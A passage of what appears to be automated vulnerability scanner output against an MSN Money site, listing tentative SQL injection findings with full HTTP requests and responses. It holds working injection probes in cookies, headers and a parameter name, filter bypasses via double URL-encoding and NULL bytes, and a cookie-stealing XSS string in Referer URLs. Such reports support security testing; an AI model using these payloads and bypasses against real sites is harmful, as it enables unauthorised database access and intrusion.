...[SNIP]...

Request 2

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:13:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

1.25. http://redacted/detail/stock_quote [expid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the expid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /detail/stock_quote?Symbol=$INDU HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2%2527;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:19 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /detail/stock_quote?Symbol=$INDU HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2%2527%2527;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price?symbol=%24INDU
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 186

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price?symbol=%24INDU">here</a>.</h2>
</body></html>

1.26. http://redacted/detail/stock_quote [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /detail/stock_quote?Symbol=$INDU&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /detail/stock_quote?Symbol=$INDU&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:153c9"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:24 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900;border:#CC9900;color:White;font-weight:bold;font-size:11pt;font-family:Arial,Helvetica;}
.normalcolor {color:#CC9900; font-size:10pt;font-family: Arial,Helvetica;}
.HRCatColor {color:#CC9900;}

.HeaderCategory{color:#CC9900;font-size:22px;}--></STYLE>

<HTML><HEAD><TITLE>MSN Money</TITLE>
<META HTTP-EQUIV="Expires" CONTENT="Fri, 01 Jan 1999 12:00:00 GMT">
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="cache-control" CONTENT="private">
<SCRIPT TYPE="text/javascript">
   function body_load()
   {
       var re = /^.*GUID=([a-f|\d]{32}).*$/i;
       var matches = re.exec( document.cookie );
       if( matches == null )
           return;

       var host = document.location.hostname;
       var domain = null;
       
       if( host.indexOf('.redacted') != -1 )
       {
           domain = 'redacted';
       }
       if( domain == null )
       {
           return;
       }

       var guid = matches[1].toLowerCase();
       if( guid == '25c836ef9256475d91344c42b54a03f9' || guid == '0f868cfe997d4557b8112a3dfaa2a8e4' )
       {
           document.domain = domain;
           document.cookie = 'MC1=;expires=Fri, 31 Dec 1999; 00:00:00 GMT; domain=' + domain;
           if( document.referrer == null || document.referrer == '' )
           {
               document.location.href = 'http://moneycentral.msn.com';
           }
           else
           {
               document.location.href = document.referrer;
           }
       }
   }
</SCRIPT>

</HEAD>
<BODY TOPMARGIN=0 LEFTMARGIN=0 MARGINHEIGHT=0 MARGINWIDTH=0 BGCOLOR=WHITE TEXT=#333333 LINK=#07519A ALINK=#07519A VLI
...[SNIP]...

1.27. http://redacted/inc/Attributions.asp [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Attributions.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:17 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 26240
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:16:18 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...

1.28. http://redacted/inc/Views/Shared/Core/Content/js/async/jasync.js [userCh cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/async/jasync.js

Issue detail

The userCh cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the userCh cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the userCh cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/async/jasync.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:57:14 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/async/jasync.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0%2527%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:29 GMT
Accept-Ranges: bytes
ETag: "80ccc6bfb8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:57:13 GMT
Content-Length: 2177


(function($)
{var defaults={timeout:50};var pending={};var pollList=[];var waitList=[];var timerId;var $isString=$.isString;var $isFunction=$.isFunction;var w=window;function async(test,action,url)
...[SNIP]...

1.29. http://redacted/inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js [s_sq cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D%00'

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:56:28 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D%00''

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:30 GMT
Accept-Ranges: bytes
ETag: "0635fc0b8abcb1:1427c"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:56:27 GMT
Content-Length: 1576


(function($)
{var defaults={proxyurl:'http://hotmailproxy.redacted/pm/v1.0/getheaders.aspx',canaryCookie:'WLMMAC',signedIn:$.signedIn,listlen:3,retries:2,domain:'http://mail.live.com/'};var subscrib
...[SNIP]...

1.30. http://redacted/inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js [CC cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js

Issue detail

The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CC cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US%2527; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:56:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US%2527%2527; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:31 GMT
Accept-Ranges: bytes
ETag: "80f9f7c0b8abcb1:161bf"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:56:23 GMT
Content-Length: 495


(function($)
{var defaults={hmtemplate:'{0} ({1})',maxcount:9999};$.fn.unreadCount=function(options)
{var settings=$.extend(true,{},defaults,options);return this.each(function()
{var $hotmail=$(t
...[SNIP]...

1.31. http://redacted/inc/Views/Shared/Core/Content/js/utilities/cookies.js [MC1 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utilities/cookies.js

Issue detail

The MC1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MC1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MC1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:24 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:32 GMT
Accept-Ranges: bytes
ETag: "09090c1b8abcb1:1a400"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 15:09:24 GMT
Content-Length: 568


(function()
{String.prototype.setCookie=function(value,expiryDays,domain,path,secure)
{var builder=[this,"=",value];if(expiryDays)
{var date=new Date();date.setTime(date.getTime()+(expiryDays*864
...[SNIP]...

1.32. http://redacted/inc/Views/Shared/Core/Content/js/utilities/cookies.js [MUID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utilities/cookies.js

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:15 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
